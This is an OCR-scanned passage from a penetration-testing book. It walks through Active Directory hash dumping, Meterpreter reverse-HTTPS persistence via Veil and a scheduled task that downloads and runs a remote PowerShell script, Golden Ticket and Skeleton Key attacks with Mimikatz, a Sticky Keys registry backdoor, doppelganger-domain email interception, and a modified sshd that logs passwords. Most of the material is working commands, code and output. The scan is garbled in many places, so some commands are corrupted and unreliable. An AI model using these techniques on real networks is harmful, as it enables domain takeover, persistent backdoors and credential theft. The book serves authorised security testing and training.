folder. Next, we will need to convert the dit file to hashes with esedbtool and NTDSextract. 


esedbexport command: 
e How to run: esedbexport -t [Location of Export] [NTDS.dit file] 


ө /opt/esedbtools/esedbexport -t /tmp/ntds 
/root/.msf4/100t/20150214180250 default 172.16.151.200 psexec.ntdsgrab. 641158. 


esedbtools/es t - /tm/t ntds /root/.msf4/lo 
i 6.1: ntdsgrab. 641158.dit 


Opening file. 
-xporting table | jec 
xporting table | sShadow) 


E 

- 

Exporting table 3 ( sj touti óf 14) 
Exporting table 4 ( out of 14, 
Exporting table 5 (di 5 

E ing table 6 (hi ident ant 

E ing table 7 (Link _һ1< 

Exporting tabl: 
E 
E 
E 
E 
E 
- 
Е 


xporting table 14 (quota rebuil d р "ogress table) out of 14. 
xport comp 








Converting NTDS.dit 


Next we need to run dshashes.py to convert our tables to password hashes. How to run: 
e dshashes.py [datatable table] [link table] --passwordhashes [original bin file from 


ntdsgrab] 
ө руйоп /opt/NTDSXtract/dshashes.py /tmp/ntds.export/datatable.4 
/tmp/ntds.export/link table.7 /tmp/ --passwordhashes 


/root/.msf4/loot/20150214180253 default 172.16.151.200 psexec.ntdsgrab. 127578. 


shes.py / 
hes /Toot/ Cm 


pro cessed 


NT records or 





Extracting Hashes 


This is just another way to dump domain hashes. In various tests, I have had either SMBExec or 
psexec_ntdsgrab not work for some odd reason. In other words, there were times when one tool 
worked while the other tool did not. Therefore, make sure you have both of these tools in your back 
pocket. 


Persistence 


One thing that I skipped in the last book is different ways to create persistence. I have found that there 
are tons of different ways to accomplish this (even the cheap method of dropping the binary in 
startup), but here are a few of my tricks. 


Veil And Powershell 


Veil has been great for evading AV, but it can also create PowerShell Meterpreter executables. I 
really prefer having PowerShell files over actual binaries, just because you never know what AV 
might pick up on. Let’s use Veil to create a quick payload. 

ө cd /opt/Veil-Evasion/ 

e ./Veil-Evasion 


First list off all ofthe available payloads by using the command list: 


Available commands: 


use use a specific payload 

info information on a specific payload 

list list available payloads 

update update Veil to the latest version 
clean clean out payload folders 

checkvt check payload hashes vs. VirusTotal 
exit exit Veil 


[^] Please enter a command: list 


Since we want to use Meterpreter Reverse HTTPS, we can pick the following: 
17) powershell/meterpreter/rev https 


We need to define all the parameters, so that the Meterpreter session can connect back to our host. Set 
the following information: 


Current Value Description 


LHOST IP of the metasplat handler 


LPORT 8443 Part of the metasploit handler 
Use system proxy settings 





For example, my Kali Linux host is 172.16.151.140. To set the Local Host: 


[>] set LHOST 172.16.151.140 
[>] Please enter a command: generate 
[>] Please enter the base name for output files: reverse_https 


And your output might look something like the following: 


reve 


oad files have been generated, don't get caug 


to the main menu: 









Veil-Framework 


Take a look at the two files created. The reverse_https.bat file will contain what looks like to be the 
following: 





PowerShell Encoded Meterpreter 


This is a PowerShell compressed bat file that will detect processor architecture and implement the 
proper PowerShell payload to connect back to your listener. 

The second file is a resource file, as we have seen before, that will automatically set up our handler 
to accept the PowerShell payloads. Kick off the resource file with “msfconsole -r /root/veil- 
output/handlers/reverse https handler.rc". 


[*] Processing /root/veil-output/handlers/reverse_https_handler.rc for ERB directives. 
resource 

(/root/veil-output/handlers/reverse_https_handler.rc) 

> use exploit/multi/handler 


resource 
(/root/veil-output/handlers/reverse_https_handler.rc) 
> set PAYLOAD windows/meterpreter/reverse_https 


resource 
(/root/veil-output/handlers/reverse_https_handler.rc) 
> set LHOST 172.16.151.140 


resource 
(/root/veil-output/handlers/reverse_https_handler.rc) 
> set LPORT 8443 


resource 
(/root/veil-output/handlers/reverse_https_handler.rc) 
> set ExitOnSession false 


resource 
(/root/veil-output/handlers/reverse_https_handler.rc) 
> exploit —j 


[*] Exploit running as background job. 

[*] Started HTTPS reverse handler on https://0.0.0.0:8443/ 
[*] Starting the payload handler... 

msf exploit(handler) > 


Now you can do a few things here. You can drop that bat file into the startup folder, configure a 
scheduled task to run that PowerShell script, or execute the PowerShell from a command line. 


To run it from a command shell, you need to remove the backslashes (two of them), change the inside 
quotes to ticks, and remove the ending parenthesis. For example, from the reverse_https.bat, we 
stripped out just what we need to execute the Meterpreter (and cleaned up the backslashes, inside 
quotes, and end parenthesis). The benefit of this is that you don’t need to download any PowerShell 
script. The whole payload is compressed in the command below (for 64bit systems): 


%WinDir%\syswow64 \windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec 


Bypass -Command  "Invoke-Expression | $(New-Object | IO.StreamReader | ($(New-Object 
IO. Compression.DeflateStream ($(New- Object IO.MemoryStream 
(,$([Convert] ::FromBase64String(nVRtb9pIEP7OrxhZe5Kt YMe8 NE2wIp WSps I doTSk...pKRtsdc5C 
ПО. Compression. CompressionMode] :: Decompress)), [Text. Encoding] :: ASCII)). Read ToEnd(); " 


We can also drop the reverse https.bat onto the host, put it in the startup folder, and on a successful 
reboot get a full Meterpreter session back to our host: 


msf exploit(handler) > 

[*] 172.16.151.202:49850 Request received for /3gZh... 

[*] 172.16.151.202:49850 Staging connection for target /3gZh received... 

[*] Meterpreter session 2 opened (172.16.151.140:8443 -> 172.16.151.202:49850) at 2015-01-13 
03:02:18 -0500 


Persistence With Schedule Tasks 


We are going to reuse the PowerSploit invoke-shellcode to keep persistence on the host system. 
Because we have limited space in the schtask function and we may want our reverse https 
Meterpreter sessions to change destination hosts, we are going to modify the invoke-shellcode 
PowerShell script and repost it. Once re-posted, we will configure a schtask to run once a day and 
connect back to our Meterpreter handler. {24} 


First we need to grab a copy of invoke-shellcode and modify it. We will use our Kali host machine to 
modify the invoke-shellcode script. 
e cd /opt/PowerSploit/CodeExecution 


As we said before, we are limited in space, so we are going to copy the original file to a shortened 
file: 
e cp Invoke-Shellcode.ps1 1.ps1 


Next, let's go ahead and edit 1.рѕ1 script and add our reverse shell information at the bottom of this 
ps1 file. To do this, add the following line while filling in the Listener IP and Port: 
e  Invoke-Shellcode -Payload | windows/meterpreter/reverse https | -Lhost 
[LISTENER IP] -Lport [LISTENER PORT] -Force; 


For example, my Metasploit handler is on 192.168.199.128 and listening on port 8443. I add this to 
the last line: 


e  Invoke-Shellcode -Payload | windows/meterpreter/reverse https | -Lhost 
192.168.199.128 -Lport 8443 -Force; 


1.ps1 (/opt/PowerSploit/CodeExecution) = VIM 





Modifying Invoke-Shellcode 


We now have our shortened invoke-shellcode script and can move this file off to a web server. In this 
example, we can just move it to /var/www and start the apache web server: 

e cp 1.рѕ1 /var/www/ 

e service apache? start 


Validate this by going to http://[YourIP]/1.ps1 


Generally, I would host this file on a URL shortened site, but for this example, we are just hosting it 
locally. Everything is set up to add persistence to our victim host. All we need is a shell and the 
following command: 


ө schtasks /create /tn AdobeUpdate /tr 
"c: \windows\syswow64\ Windows PowerShell\v1.0\powershell.exe -NoLogo - 
WindowStyle hidden -NonInteractive -ep bypass -nop -c ТЕХ ((new-object 
net.webclient).downloadstring("'http://| YourIP]/1.ps1"'))'" /SC DAILY /ST 12:00:00 


This creates a schtask named AdobeUpdate that runs at noon everyday to download your modified 
PowerShell script and execute it. Two additional options are: 
e If you have system privileges, you can run the script under system. Just add the 
following switch to the above command: 
o /ru System 
e If you are attacking a 32bit Windows system, change the PowerShell location in 


your schtask to: 
о c:\windows \system32\WindowsPowerShell\v1.0\powershell.exe 


Golden Ticket 


Kerberos is something extremely important to understand. Since explaining exactly how Kerberos and 
Kerberos Tickets work is pretty complicated, I will direct you to a SANS blog article that covers this 
topic well. 


Full Link: 
http://digital-forensics.sans.org/blog/2014/1 1/24/kerberos-in-the-crosshairs-golden-tickets-silver- 
tickets-mitm-more 





Bit.ly Link: 
http://bit.ly/ IDKOkaS 


In short, Kerberos is used as an authentication and authorization platform, which uses tickets. What if 
you could create you own tickets to authenticate to any server? That is exactly what the Golden Ticket 
could do. On the topic of persistence, let's say you have compromised a Domain Controller in the 
past and dumped all the hashes. Your client tells you a week later that they fixed all the 
vulnerabilities that you identified to get Domain Admin and changed all the passwords. They hire you 
again to see what you can do. You do the normal social engineering to get your initial shell, but now 
you are only a limited user. All the initial entry points are now blocked and they have limited 
scanning detection/prevention. 


With the Golden Ticket, you don't have to worry about anything. You can take the old krbtgt hash 
from the previous hash dump and promote yourself back to a Domain Admin. Best of all, you can do 
all this with an unprivileged account. A few things you need to know about the krbtgt: 
e It is not recommended to reset the system generated password. It could break the 
whole domain. Therefore, it 1s generally never changed. (Although Microsoft recently 
released a tool to handle resetting the krbtgt account). 
e Even if you change every password for every domain admin, you can still become a 
DA. 
e The only time I have seen the system generated password changed is from a function 
2003 to 2008 upgrade. 
e You can create Users and Groups that don’t exist with the Golden Ticket. 


So what do you need to perform the Golden Ticket attack? {25} {26} {27} 
e 1) Domain 
o Ona victim host type: whoami 
e 2) Domain Admin User 


© Ona victim host type: net localgroup administrators /DOMAIN 
e 3) Domain SID 


© Ona victim host type: whoami /user 


o Chop off the last dash and four digits 
e 4) Krbtgt 


o From a previous hashdump, you just need the second half of the hash 
(just the NTLM hash) 


imsf exploit(handler) > sessions -i 2 
[*] Starting interaction with 2... 


jmeterpreter > shell 

|Ргосеѕѕ 1708 created. 

"Channel 2 created. 

(Microsoft Windows [Version 6.1.7601] 

Copyright (c) 2009 Microsoft Corporation. All rights reserved. 


lhacker\festuse rl 


1С: \Users\testuserl\Desktop>net localgroup administrators /DOMAIN 
‘net localgroup administrators /DOMAIN 
The request will be processed at a domain controller for domain hacker.‘ 


|Allas name administrators 
Comment Administrators have complete and unrestricted access to 1 


jMembers 


Administrator 
{Domain Admins 


Firerprise Admins 


‘Local Admin 
1Тһе command completed successfully. 


ІС: \Users\testuserl\Desktop>whoam1 /user 
whoami /user 


JUSER INFORMATION 


040179600 





Information Needed to Create Golden Ticket 


As seen in prior examples, to get the krbtgt hash, we first had to dump all the domain hashes. This can 
be accomplished using smbexec with a Domain Admin account. Running smbexec, I chose Hash 
Dump and dumped the Domain Controller. 


ik oc AR i d ak ab D kc b DC c ik ORC c lc kc OK C E lc E C E dl D RC OC a ap AH a AR Ct c OE b i ln C RC E CRGO o 


* smbexec 2.0 - Machiavellian + 


ee EEEE, 
Hash Dump Menu 

1. Domain Controller 172,16,151.200 

2. Workstation 5 Server Hashes hacker. testlab\lab 

3, Main menu Pass: lAsdfasdfasdfl! 

Choica : ] 

Gather hashes from the Domain Controller's NTDS.dit file. 

Target IP, host list, or nmap XML file [1/2.16.151.200] : 

Username [lab] : 


Password or hash [«LMs:«NTLMs) [Pass: !Asdfasdfasdfl!] : 
Domain [hacker.testlab] : 


enter the Drive to save the Shadow Сору and SYS key [С:]: 

Entar, the) Path te Saye the|Shadow Copy and SYS key [\Windows\|EMP] : 
Enter the! Driva where ithe NTDS.dit file is [C:]: 

enter ‘the-Path to tha-NI0S,dit- file [\Windows\NIDS) : 


sys copied to ‘oa/snbexec - 2815- ]- 5/hashes/172. 16. 151. 8/58. 
| Deleting shadow copy id {36926043 -/84а-41с?-0266-19/028559807}.. 
Deleting copied files from C:\Windows\TEMP. . 

Exporting NTDS file contents, this might take awhile... 





Recovering Hashes from the Domain Controller 


Once completed, a log file will be created with the Domain Hashes. The hash that you will need is 
the second part of the krbtgt hash. 


root@kali: /opt/smbexec 172.16.151.200. DC. dump.txt (/op...log/smt 
gdministrator:500:aad3b435b514046eeaad3b435b51404 : : 


nac ce 





krbtgt's Hashes 


Now we have everything we need to create the Golden Ticket. Go back to our original shell: 
e First drop into Mimikatz 2.0 
o use kiwi 
e Create Golden Ticket 
o golden ticket create -u «Domain Admin Username» -d «Domain» - 
k «krbtgt hash» -s «Domain SID> -t «Location to Drop Golden Ticket> 


meterpreter > use kiwi 
Loading extension kiwl.. 


ы mimikatz 2.0 alpha (x86/win32) release "Kiwi en C" 


J* * 93 

Benjamin DELPY "gentilkiwi ( benjaminggentilkiwi 
http: //blog. gentilkiwi.com/ nimikatz 

Ported to Metasploit by 0) Reeves TheColonial 


[!] Loaded x86 Kiwi on an x64 architecture. 

success, 

geal bed > golden ticket create -u lab -d hacker -k O4f3c2fa60ed9f8f 30803df6837ebed3 
T: -21- 3525058729- 1821581466- 20401 79600 -t /opt/ ticket. txt 


d Бө Kerberos ticket written to /opt/ticket.tzt 
Creating the Golden Ticket 


That’s it. We now have a Golden Kerberos Ticket. As we said with our scenario before, your client 
SUCK has asked you to come back for a remediation test. You verify that they fixed all the holes from 
last time and passwords are reset, but remember you have the Golden Ticket. 


You use a little spearphishing to get your initial handle into the company with an unprivileged shell. 
You test your access by trying to see if you can read any files on the Domain Controller, but you don’t 
have access. You take a look at your Kerberos tickets and see that you are a limited user. 


Using the Golden Ticket 
ө Shell Access with Limited Access (does not have to be Local Administrator) 


© sessions -i [id] 
e Load Mimikatz 2.0 
o use kiwi 
e Check current Kerberos Tickets 
o kerberos ticket list 
e Purge all Kerberos Tickets 
© kerberos ticket purge 
ө Local our Golden Ticket (stored in /opt/ticket.txt on our Kali VM) 
© kerberos ticket use /opt/ticket.txt 
e Drop into a shell and read files off the DC 
o shell 
o dir \\DC\c$ 


Below, we are checking out what Kerberos tickets are currently have loaded. From reading the 
access, all the tickets are currently owned by testuser1 (limited account). 


[*] Meterpreter session 7 opened (172.16,151.128:8080 -> 172.165.151. 202: 58204) at 2015-01-08 00:26:18 -0500 


ast exploit| 1 > sessions - 
- 


И Starting interaction with 7... 


heterpreter > use kiwi 
Loading @xtension Kiwi.. 


Bisikatz 2.0 alpha (x86/wing2) release "Kiwi en С" 


9E a Е 

Benjamin DELPY "gentilkiwi { benjaminügentilkiwi.com ) 
http: //blog.gantilkiwi.com/mimikatz LINT 
Ported to Hetasploit by 0) Reevas TheColonial + + */ 


[11 Loaded x86 Kiwi on an x64 architecture 

SUCCESS 

neteroreter > Kerberos - lcket 

kerberos ticket list kerberos ticket purge kerberos ticket use 
Beterpreter > kerberos ticket list 


Kerberos Tickets 


шшышшшщшщщщщшшшщшщшщ 


LDAP/DC.hacker.testlab/hacker.testlab à HACKER. TESTLAB testuserl à HACKER. TESTLAR 2015-01-06 05: 22: 32.000 
‚ЖЮ 40450000 (NAME CANONICALIZE, OK AS DELEGATE, PRE AUTHENT, RENEWABLE, FORWARDABLE) 

cifs/de. hacker. testlab @ HACKER. TESTLAB testuserl @ HACKER. TESTLAB 2015-01-08 05: 

-000 40350000 (NAME CANONICALIZE, OK AS DELEGATE. PRE AUTHENT, RENEWABLE. FORWARDABLE) 

Krbtgt/HACKER. TESTLAB @ HACKER, TESTLAB ОВ 05:22:23, 000 
000 60410000 (NAME CANOMICALIZE, PRE AUTHENT, RENEWABLE, FORWARDED, FORWARDABLE) 

krbtgt/HACKER.TESTLAB à HACKER. TESTLAB testuserl @ HACKER. TESTLAB 2015-01-08 02:11:2 

„000 40010000 (NAME CANONICALIZE, PRE AUTHENT, INITIAL. RENEWABLE, FORWARDABLE) 

Ldap/de. hacker. testlab @ HACKER. TESTLAB testuserl @ HACKER. TESTLAB 2015-01-07 06:42: 43.1 
-000 40350000 (NAME CANONICALTIZE, OK AS DELEGATE, PRE AUTHENT, RENEWABLE, FORWARDABLE) 


Total Tickets : 5 
Current Kerberos Tickets 


We can verify this by dropping into a shell: 


meterpreter > shell 
Process 1524 created. 


Channel 1 created. 
Microsoft Windows [Version 6.1.7601] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved. 


C:\Users\testuser1\Desktop>dir \\dc\c$ 





dir \\dc\c$ 
Access is denied. 


Without Domain Administrative privileges, we can’t log into the Domain Controller. We need to first 
purge all of our current Kerberos tickets. Once purged, use our Golden Key to create a “lab” user 
ticket. From the work prior, we found that the lab account had been part of the Domain Admin group. 


Once we list our tickets again, we see below that we now have a “lab” ticket in our ticket list. 


meterpreter > kerberos ticket purge 

[+] Kerberos tickets purged 

meterpreter > kerberos ticket use /opt/ticket. txt 

[*] Using Kerberos ticket stored in /opt/ticket.txt, 1093 bytes 
[+] Kerberos ticket applied successfully 

meterpreter > kerberos ticket list 


Kerberos Tickets 


End 


krbtgt/hacker @ hacker lab @ hacker 2015-01-07 08:37:54.000 2025-01-07 08:37:54.000 
E, FORWARDABLE) 


Total Tickets ; 
meterpreter > 





Importing “lab” Kerberos Tickets 


If we do a listing on the Domain Controller, we can see that we now have full access to the DC. They 
could have changed every user account password after the initial hashdump, but with the krbtgt hash, 
we can create any Kerberos ticket we want. 


meterpreter > shell 
Process 2644 created. 


Channel 7 created. 
Microsoft Windows [Version 6.1.7601] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved. 


С: \Users\testuserl\Desktop>dir \\DC\C$ 
dir \ \DC\C$ 
Volume in drive \\DC\C$ has no label. 
Volume Serial Number is 40F8-1BB4 


Directory of \\DC\C$ 


08/22/2013 07:52 AM <DIR> PerfLogs 
12/28/2014 02:28 PM <DIR> Program Files 
08/22/2013 07:39 AM <DIR> Program Files (x86) 
01/06/2015 10:52 PM <DIR> Share 
12/28/2014 02:28 PM <DIR> Users 
01/05/2015 01:02 AM <DIR> Windows 

О File(s) O bytes 

6 Dir(s) 20,697,817,088 bytes free 





С: \Users\testuserl\Desktop>* [Jj 
Accessing the Domain Controller 


With the Golden Ticket, we have access to servers, and can drop files, but how can we execute 
commands using the Kerberos Domain Admin Ticket? 


As shown in prior chapters, WMIC supports the ability to execute remote commands. This command 
uses the current Kerberos Tickets against a remote server (Node). We are going to execute a ping 
command, write that to a file on a remote Windows 8 server from our compromised Windows 7 
Golden Ticket box. 


e wmic /authority:"Kerberos:hacker.testlab\win8" /node:win8 process call create 
"ста /c ping 127.0.0.1 > C:\log.txt" 


\Weers\testuser] \Desktogavmic authority: "Kerberos: hacker. tes stab wind’ node wing process call create "cad /¢ 
vin 127.0.0.1 > Alog: tet" 
wc /autwority: “Kerderos:hacker, test Lay wand" s call create "end /c ping 127.0.0.1 > C:\lo 
Execut ШМ] (їїлї2_ Process) -xCraate() 
Method execution successful 


Cut Parameters: 

instance of — PARAMETERS 

{ 
Processld a 4676 
Raturnvalue = 0: 





WMI and Kerberos Ticket 


Double-checking our Windows 8 host, we see that the command was successful and we can now 
move laterally throughout the whole domain. 


© Windows 8 x64 











2 Ш = Local Disk (С: 

m o: е v 
~ T Ё Computer » Local Disk (С) 

X Favorit [ 
BE Desktop D PerfLogs 

JB Downloads 4& Program Files 

3) Recent places Je. Program Files (x86) 

ds Us 

8 Libraries de Window 

*| Documents м leg 

фм 
ЖӘ Pictures 
a video File Edit Format View Help 
E Computer 


Pinging 127.0.0.1 with 32 bytes of data: 
Reply from 127.0.0.1: bytes-32 time<ims TTL-128 


i, Local Disk (С) 


4 PerfLogs Reply from 1p7.0.0.1: bytes-32 time<ims TTL=128 

de Program Files Reply from 127.0.0.1: bytes-32 time<las TTL-128 

il Program Files (x86 Reply from 127.0.0.1: bytes=32 tíme«lms TTL=128 

4 Use - "AR 

d шь Ping statistics for 127.0.0.1: 

Packets: Sent = 4, Received = 4, Lost = Ө (0X loss), 

Ф Public Approximate round trip times in milli-seconds: 

de testuser2 Minimum = Oms, Maximum = Oms, Average = Oms 


Validate Command Execution 


Skeleton Key 


As a penetration tester, one of your greatest resources is monitoring what the real bad guys are doing. 
For example, Dell Secureworks identified malware that would backdoor privileged Active Directory 
accounts: 





Luckily for us Benjamin Delpy and his amazing tool Mimikatz implemented the Skeleton Key feature. 
{28} This attack will backdoor a Domain Administrative account. Let’s say you have already gained 
a domain admin account and you were able to log into a domain controller (remember you will have 
to do this to every domain controller in the environment). We can put a copy of our modified 
Mimikatz on there so we don’t trigger antivirus. 


To install our Skeleton Key is pretty easy: 


e mimikatz.exe “privilege::debug” *misc::skeleton" exit 


өөө © Windows Server 2012 


enjamin@gentilkiwi.cor 


mimikatz(cc 
[KDC] data 
[KDC] struct 
[KDC] keys patch Ok 
4] functio 
4] init patch OK 


[RC4] decrypt p 





Skeleton Key 


If we go back to any computer on the network and try to connect to the Domain Controller, of course 
we won’t have access with our regular Active Directory account. We try to run “dir \\dc\c$” to read 
the C-Drive on the domain controller. But don’t forget about our skeleton key. 


Even if we don’t know the password of the domain admin account “lab”, with the Skeleton Key 
implemented, we can use the new backdoor password of ^mimikatz". 


To demonstrate this we can mount a drive from any computer on the network using the password 
"^mimikatz" and with the “lab” account from which we executed the skeleton key from. 


In the first command we try to read files from the domain controller, but are unsuccessful. 
e net use * \\dc\c$ mimikatz /user:lab@hacker.testlab 


Next, we mount a share drive to the domain controller's C-Drive using the “lab” account and the 
backdoor password “mimikatz’. 





fre 


(s) 20,905,398,272 bytes free 
Skeleton Key - Backdoor Password 


We now have full access into the domain controller with our backdoor password. Both the original 
domain admin’s password and mimikatz will work at the same time. 


Sticky Keys 


Sticky Keys is one of my favorite persistence methods. If you have never dealt with sticky keys 
before, try hitting shift 5 times on any Windows host. Microsoft states that: 


"StickyKeys is designed for people who have difficulty holding down two or more keys at a time. 
When a shortcut requires a key combination such as Ctrl+P, StickyKeys allows you to press one key 
at a time instead of pressing them simultaneously." {29} 


We can take advantage of sticky keys by replacing the sticky key executable with a shell. The old 
method used to manually replace sethc with cmd, but this can now be done within registry settings. 


e REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image 
File Execution Optionssethc.exe" /v Debugger Л КЕС SZ  /d 
"C:\windows\system32\cmd.exe" 


e REG ADD "HKLM\SYSTEM\CurrentControl Set'Control Terminal 
Server\WinStations\RDP-Tcp" /v UserAuthentication /t КЕС DWORD /d 0 
e REG ADD "HKLM\SYSTEM\CurrentControl Set\Control\Terminal 


Server\WinStations\RDP-Tcp" /v SecurityLayer /t КЕС DWORD /d 0 


Two additional settings you might need to run: 


e Change firewall setting to allow RDP 
o netsh advfirewall firewall set rule group="remote desktop" new 
enable-Yes 

e Enable Remote Desktop Connections 
о КЕС ADD 
"HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\Ter 
Server" /v fDenyTSConnections Ж REG. DWORD /d 0 /f 


Don't forget the power of WMI and being able to trigger these settings remotely. Remember you will 
be a privileged local administrative account or domain admin. 
e wmic /user:[User Name] /password: [Password] /node: [Server] process call create 
"C:\Windows\system32\reg.exe ADD — 'HKLMNSSOFTWAREMIicrosoft Windows 
NT\CurrentVersion\Image File Execution Options sethc.exeV" /v Debugger Л КЕС SZ 
/d \"C:\windows\system32\cmd.exe\" /f" 
e wmic /user:[User Name] /password: [Password] /node: [Server] process call create 
"C:\Windows\system32\reg.exe ADD 
\"HKLM\S YSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP- 
Tcp\" /v UserAuthentication /t КЕС DWORD /d 0 /f" 
ө wmic /user:[User Name] /password: [Password] /node: [Server] process call create 
"C:\Windows\system32\reg.exe ADD 
\"HKLM\S YSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP- 
Тер\" /v SecurityLayer /t REG. DWORD /d 0 /f" 


Optional Commands: 
e wmic /user:[User Name] /password: [Password] /node: [Server] process call create 
"C: Windows 'system32Wetsh advfirewall firewall set rule group=\"remote desktop" 
new enable-Yes" 
e wmic /user:[User Name] /password: [Password] /node: [Server] process call create 
"C:\Windows\system32\reg.exe ADD 
VHKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\Terminal 
Server\" /v fDenyTSConnections /t REG. DWORD /d 0 /f' 


Because we are leveraging WMI, you also have the ability to use Kerberos, if needed, by changing 
the username/password to /authority:"Kerberos:[Domain]\[Server]". Remember pass the ticket? 


Once we have configured these registry settings, we can RDP to that host without any credentials, hit 
shift 5 times, and we have a system shell. 


If you ever lose your original shell and the user changes their password, you still have your backdoor. 


89 Windows Server2012 R2 
Sticky Keys 





Conclusion 


I hope this chapter was able to get you comfortable with getting onto the network and moving laterally 
through the network. There are a large number of attacks that can help in both lateral movement and 
privilege escalation, but it really comes down to understanding what is in scope of your test and what 
has the highest probability of assisting you. It might take a few of the attacks in the Lateral Movement 
section to get you to a Domain Administrator, but keep this chapter handy as sometimes you will run 
into a brick wall and something in this book might just get you out of a jam. 


The Screen - Social Engineering 


If client attacks are in the scope of your tests, social engineering 15 your "go to" attack. There are 
many different ways to perform social engineering attacks and these can range from domain attacks to 
spear phishing, or even dropping USB sticks. Since social engineering attacks really use your own 
creativity, I will just go over a few examples that I have found to be fruitful. 


Doppelganger Domains 
I spent a lot of research time looking into doppelganger domains and trying to find the most efficient 
and most “bang for your buck” attacks. You can find more in my research paper here: 


http://www.wired.convthreatlevel/201 1/09/doppelganger-domains/. 


The concept of my research paper was to brute-force company domains for valid subdomains that had 
MX records. For my next few examples we have two different fictitious companies who utilize their 
sub-domains for email: us.company.com and uk.company.com. What I had done was to purchase all 
domains for uscompany.com, ukcompany.com and so on. This is because end users very frequently 
make the mistake of forgetting to type in the period between the domain and sub-domain. 


SMTP Attack 


Once I purchased these domains, I set up an SMTP server, configured the MX records, and finally set 
all SMTP servers as catch-all servers. This means that if anyone emails to the domain I own, 
regardless of to whom it is sent, I would record/forward all those emails to an account of my choice. 


This is usually enough to prove that you can successfully capture sensitive data and that you will see a 
lot of sensitive emails from the corporation. If you go to the article above, you will see what type of 
data was gathered and how many times we were able to get SSH/VPN/Remote Access into a 
company. We also took this proof of concept attack one step farther. 


In the following example, we are targeting the fake site bank.com, who has a subsidiary in Russia. 
The fake bank owns ru.bank.com and has MX records to that FQDN. Also, company.com (another 
fake company), owns us.company.com and has MX records for that FQDN. In this fake example, we 
purchase both the doppelganger domains uscompany.com and rucompany.com. If anyone mistypes an 
email to either domain, we will be able to inject ourselves into the middle of this conversation. Using 
a few simple python scripts, when we receive an email from john@us.company.com to 
bob@rubank.com (mistyped doppelganger for ru.bank.com), our script will take that email and create 
a new email to bob@ru.bank.com (the proper email address) and sourced from 
john@uscompany.com (the mistyped doppelganger that we own). That means any reply response to 
John from Bob will come back through us. Now, we have a full "Man in the MailBox" configured and 
can either just passively listen or attack the victims based on the trust factor they have with each 


other. 





Man in the MailBox (MITMB) 


Original E-mail Conversation 


@us.company.com — © — @ru.bank.com 





MITMB 
@us.company.com — (2) — @rubank.com 
E-mail sent to the wrong address 
@uscompany.com ee >) — @ru.bank.com 
Using the recipient doppe! er, we forward the request 
to the proper address after modifying the email 
@uscompany.com m (<) oe @ru.bank.com 


The user at ru.bank.com responds back with the requested information 


@us.company.com ome (<) Cee @rubank.com 


We respond to the original em h the information and the sender is 
unaware of the incident 
*Red domains are the domains under our control 








Man in the MailBox Example 


SSH Attack 


During my research, I also configured SSH servers with the doppelganger domains to see if people 
mistyped SSH servers and revealed their SSH passwords. There are a couple of things that need to be 
configured for a successful attack. 


First, set the DNS A record to point all records to a particular IP. For example, I set the A record 
host to "*" and pointed the host record to my IP address. Any subdomain within the doppelganger will 
point back to my server. This means the following domains will all point back to a single IP: 

e test. uscompany.com 

e dev.uscomany.com 

e deadbeef.uscompany.com 


Then, set up an SSH server that logs both the username and password. In my case, I configured a 
server running Ubuntu 11.10. Since normal sshd does not record the passwords, I had to modify a 
version of sshd. This is done by downloading openssh portable 5.9p1: 

wget http://mirror.team-cymru.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p 1 .tar.gz 


To Extract OpenSSH: 
ө tar xvfz openssh-5.9p1 .tar.gz 


ө Go into the openssh directory: 
О cd openssh-5.9p1 
It is required to modify the auth-passwd.c file before compiling sshd. Below is what I changed, but I 


have also included the whole  auth-passwd.c file you should replace in sshd 


[https://www.securepla.net/download/auth-passwd.c]: {30} 


if(lsys auth passwd(authctxt, password)) 

{ 

FILE *garp; 

garp = fopen("/var/log/sshd_logged", "a"); 

chmod("/var/log/sshd_logged", 0600); 

fprintf(garp,"%s:%s:%s\n" authctxt->user,password,get remote ipaddr()); 
fclose(garp); 


j 
return (result && ok); 


Now, when I have an invalid login, I write out the username, password, and IP address into a file 
located in /var/log/sshd_ logged. 
After replacing the auth-passwd.c file, let's compile and make it: 

e sudo ./configure --prefix=/opt --sysconfdir=/etc/ssh 

e make 

e sudo make install 


I should have a working version of our new sshd service. To start sshd: 
ө /opt/sbin/sshd 


Then, run the command and you should see username password combinations scroll by: 
e tail -f/var/log/sshd logged 


Output: 
e root: Harmon01:192.168.10.10 
e admin: AMW&369!: 192.168.10.111 
e tomihama: tomihhama:192.168.10.24 
e root: hx7wnk:192.168.10.19 


We are successfully recording username/password combinations. You will have to be extremely 
patient with this attack and hope a developer or IT user mistypes the domains to SSH. I love these 
attacks because they are not the normal types of attacks and give you the chance to get creative with 
them. 


Phishing 


Phishing, or email in general, is one of the most commonly used and effective vectors for remote 
attacks. This is because they rely on users as victims, instead of unpatched or misconfigured services. 


Victims can be easily swayed to perform actions generally based on fear and urgency. The fear and/or 
urgency usually stems from some type of financial loss, personal loss, or the fear of missing out. If 
you can trigger one of these emotions, it can cause a victim to do things they wouldn’t normally do. 
Although there are numerous books on manipulating people, two books I would recommend: 

e Behavioral Programming (2015): The Manipulation of Social Interaction - 


http://amzn.to/1CJGb4y 
e Social Engineering: The Art of Human Hacking (2010) - http://amzn.to/ 1 CIH3pOQ 


These books describe types of social interactions, manipulation of people, word selection, and many 
tools for all methods of social engineering. 


In the first THP, I focused on using Metasploit pro, but I decided to go with open source in this 
example, which allows me to get more creative. After setting up a few phishing exercises, you will 
see that it is pretty easy. 


There are plenty of open source phishing tools, such as: 


e Catero: http://section9labs. github.10/Cartero/ 
e Phishing Frenzy: http://www.phishingfrenzy.com/ 
e Social Engineering Toolkit: https://github.convtrustedsec/social-engineer-toolkit 


However, after running numerous phishing attacks, I found that having numerous custom scripts ready 
for different scenarios works best. Although this might not work for your situation, this should help 
you get different ideas for a successful campaign. 


Manual Phishing Code 
(https://github.com/cheetz/spearphishing)(Kali Linux): 


This 1s a sample beta code I have written to take care of my spear phishing campaigns. The code 
repository is located here: https://github.com/cheetz/spearphishing and it is really up to you to 
customize it for your own campaign. In the default code, we are going to use GoDaddy's SMTP 
services, but you can easily customize it according to your own SMTP server. The spear.py client 
